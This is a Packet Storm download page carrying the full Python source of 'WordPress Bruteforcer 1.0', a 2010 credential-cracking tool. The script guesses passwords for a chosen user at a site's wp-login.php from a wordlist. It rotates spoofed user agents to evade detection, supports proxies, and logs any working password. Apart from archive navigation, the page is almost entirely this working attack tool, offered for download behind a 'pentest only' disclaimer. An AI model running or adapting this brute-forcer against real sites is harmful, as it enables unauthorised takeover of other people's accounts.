exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Bruteforcer 1.0

WordPress Bruteforcer 1.0
Posted Aug 6, 2010
Authored by gunslinger | Site gunslingerc0de.wordpress.com

WordPress bruteforcing utility written in Python.

tags | cracker, python
SHA-256 | a2034c763500e62ae673b23d3340fe7b390d6fb4594623e33a4d8d8ef4f850c7
Download | Favorite | View

WordPress Bruteforcer 1.0

Change Mirror Download
#!/usr/bin/python
# This is wordpress bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname   : wpbruteforcer.py
# Programmer   : gunslinger_ <yudha.gunslinger@gmail.com>
# Version  : 1.0
# Date    : Wed Aug  4 13:38:13 WIT 2010

import re
import os
import sys
import random
import warnings
import time
try:
  import mechanize
except ImportError:
  print "[*] Please install mechanize python module first"
  sys.exit(1)
except KeyboardInterrupt:
  print "\n[*] Exiting program...\n"
  sys.exit(1)
try:
  import cookielib
except ImportError:
  print "[*] Please install cookielib python module first"
  sys.exit(1)
except KeyboardInterrupt:
  print "\n[*] Exiting program...\n"
  sys.exit(1)
  
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable 
__programmer__   = "gunslinger_ <yudha.gunslinger@gmail.com>"
__version__      = "1.0"
verbose   = False
useproxy  = False
usepassproxy  = False
log    = 'wpbruteforcer.log'
file    = open(log, "a")
success    = 'Dashboard'
# some cheating ..
ouruseragent   = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
          'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
          'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
          'Microsoft Internet Explorer/4.0b1 (Windows 95)',
          'Opera/8.00 (Windows NT 5.1; U; en)',
    'amaya/9.51 libwww/5.4.0',
    'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
    'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
    'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
    ]
wordpress   = '''
                       _                         
                      | |                        
__      _____  _ __ __| |_ __  _ __ ___  ___ ___ 
\ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
 \ V  V / (_) | | | (_| | |_) | | |  __/\\__ \\__ \\
  \_/\_/ \\___/|_|  \__,_| .__/|_|  \\___||___/___/
                        | |                      
                        |_|      bruteforcer...
          
Programmer : %s
Version     : %s''' % (__programmer__, __version__)
option           = '''
Usage  : %s [options]
Option : -t, --target    <hostname>  |   Site for bruteforce wp-admin
         -u, --username    <username>       |   User for bruteforcing
         -w, --wordlist    <filename>       |   Wordlist used for bruteforcing 
         -v, --verbose        |   Set %s will be verbose (more talkactiveable)
         -p, --proxy     <host:port>  |   Set http proxy will be use
         -k, --usernameproxy  <username>  |   Set username at proxy will be use
         -i, --passproxy  <password>  |   Set password at proxy will be use
         -l, --log     <filename>  |   Specify output filename (default : fbbruteforcer.log)
         -h, --help        <help>           |   Print this help
                                                  
Example : %s -t target.com -u jack -w wordlist.txt"
     
P.S : add "&" to run in the background  
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme     = '''
Usage : %s [option]
  -h or --help for get help
  ''' % sys.argv[0]


def helpme():
  print wordpress
  print option
  file.write(wordpress)
  file.write(option)
  sys.exit(1)
  
def helpmee():
  print wordpress
  print hme
  file.write(wordpress)
  file.write(hme)
  sys.exit(1)
  
for arg in sys.argv:
  try:
    if arg.lower() == '-u' or arg.lower() == '--user':
                username = sys.argv[int(sys.argv[1:].index(arg))+2]
          if arg.lower() == '-t' or arg.lower() == '--target':
                target = sys.argv[int(sys.argv[1:].index(arg))+2]
                if "http://" in target:
                  target = target.replace("http://","")
                if "www." in target:
                  target = target.replace("www.","")
                targetsite = "http://www."+target+"/wp-login.php"
    elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
          elif arg.lower() == '-l' or arg.lower() == '--log':
                log = sys.argv[int(sys.argv[1:].index(arg))+2]
          elif arg.lower() == '-p' or arg.lower() == '--proxy':
            useproxy = True
                proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
          elif arg.lower() == '-k' or arg.lower() == '--userproxy':
            usepassproxy = True
                usw = sys.argv[int(sys.argv[1:].index(arg))+2]
          elif arg.lower() == '-i' or arg.lower() == '--passproxy':
            usepassproxy = True
                usp = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-v' or arg.lower() == '--verbose':
                verbose = True
          elif arg.lower() == '-h' or arg.lower() == '--help':
            helpme()
    elif len(sys.argv) <= 1:
      helpmee()
  except IOError:
    helpme()
  except NameError:
    helpme()
  except IndexError:
    helpme()
          
def bruteforce(word):
  try:
    sys.stdout.write("\r[*] Trying %s...                   \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t " % word)
    file.write("[*] Trying %s\n" % word)
    sys.stdout.flush()
    br.addheaders = [('User-agent', random.choice(ouruseragent))]
    opensite = br.open(targetsite)
    br.select_form(nr=0)
    br.form['log'] = username
    br.form['pwd'] = word
    br.submit()
    response = br.response().read()
    if verbose:
      print response
    if success in response:
      print "\n\n[*] Logging in success..."
      print "[*] Username : %s" % (username)
      print "[*] Password : %s\n" % (word)
      file.write("\n[*] Logging in success...")
      file.write("\n[*] Username : %s" % (username))
      file.write("\n[*] Password : %s\n\n" % (word))
      sys.exit(1)  
  except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
  except mechanize._mechanize.FormNotFoundError:
    print "\n[*] Can't launch attack sorry, form is different\n"
    file.write("\n[*] Can't launch attack sorry, form is different\n")
    sys.exit(1)
  except mechanize._form.ControlNotFoundError:
    print "\n[*] Can't launch attack sorry, form is different\n"
    file.write("\n[*] Can't launch attack sorry, form is different\n")
    sys.exit(1)
    
def releaser():
  global word    
  for word in words:
    bruteforce(word.replace("\n",""))
    
def main():
  global br
  global words
  try:
    br = mechanize.Browser()
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    br.set_handle_equiv(True)
    br.set_handle_gzip(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)
    br.set_debug_http(False)
    br.set_debug_redirects(False)
    br.set_debug_redirects(False)
    br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    if useproxy:
      br.set_proxies({"http": proxy})
    if usepassproxy:
      br.add_proxy_password(usw, usp)
    if verbose:
      br.set_debug_http(True)
      br.set_debug_redirects(True)
      br.set_debug_redirects(True)
  except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    file.write("\n[*] Exiting program...\n")
    sys.exit(1)
  try:
    preventstrokes = open(wordlist, "r")
    words          = preventstrokes.readlines()
    count          = 0 
    while count < len(words): 
      words[count] = words[count].strip() 
      count += 1 
  except IOError: 
      print "\n[*] Error: Check your wordlist path\n"
    file.write("\n[*] Error: Check your wordlist path\n")
      sys.exit(1)
  except NameError:
    helpme()
  except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    file.write("\n[*] Exiting program...\n")
    sys.exit(1)
  try:
    print wordpress
    print "\n[*] Starting attack at %s" % time.strftime("%X")
    print "[*] Target site : %s" % (targetsite)
    print "[*] Account for bruteforcing \"%s\"" % (username)
    print "[*] Loaded :",len(words),"words"
    print "[*] Bruteforcing wp-login, please wait..."
    file.write(wordpress)
    file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
    file.write("\n[*] Target site : %s" % (targetsite))
    file.write("\n[*] Account for bruteforcing \"%s\"" % (username))
    file.write("\n[*] Loaded : %d words" % int(len(words)))
    file.write("\n[*] Bruteforcing wp-login, please wait...\n")
  except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
  try:
    releaser()
    bruteforce(word)
  except NameError:
    helpme()

if __name__ == '__main__':
  main()
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close